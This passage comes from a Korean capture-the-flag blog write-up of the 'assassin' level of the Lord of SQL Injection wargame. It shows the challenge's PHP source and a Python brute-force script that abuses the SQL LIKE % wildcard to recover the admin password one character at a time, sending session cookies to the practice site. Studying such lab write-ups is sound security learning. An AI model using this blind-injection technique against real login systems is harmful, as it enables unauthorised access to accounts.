query : {$query}
";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) echo "Hello {$result[id]}
";
if($result['id'] == 'admin') solve("assassin");
highlight_file(__FILE__);
?>pw like 가 있으므로 like의 %를 잘 이용해주면 된다!
스크립트를 이용했다. guest와 admin이 앞글자 2글자가 같아서 처음에는 그냥 Hello guest가 나왔는데
세번째 글자까지 찾았을때는 2와 d로 나뉘었다!
import requests
def main():
cookie={"__cfduid":"d282347679afbe7ce118657ef96dd67f61530072154","PHPSESSID":"25bfqp0uqr6pmep83spki2t522"}
query='https://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php'
x=0
while(1):
x+=1
query_add=query+"?pw=83"+chr(x)+"%0"
result=requests.get(query_add, cookies=cookie)
#print(result.text)
if(result.text.find("Hello")<1000):
print("GOOD : "+chr(x))
if(x==128):
break
print(str(x))
if(__name__=="__main__"):
main()
'웹 해킹 > lord of SQL' 카테고리의 다른 글
| los 16번-답 참고! (0) | 2018.06.29 |
|---|---|
| los 15번 (0) | 2018.06.29 |
| los 13번 (0) | 2018.06.28 |
| los 12번 (0) | 2018.06.28 |
| los 11번 (0) | 2018.06.28 |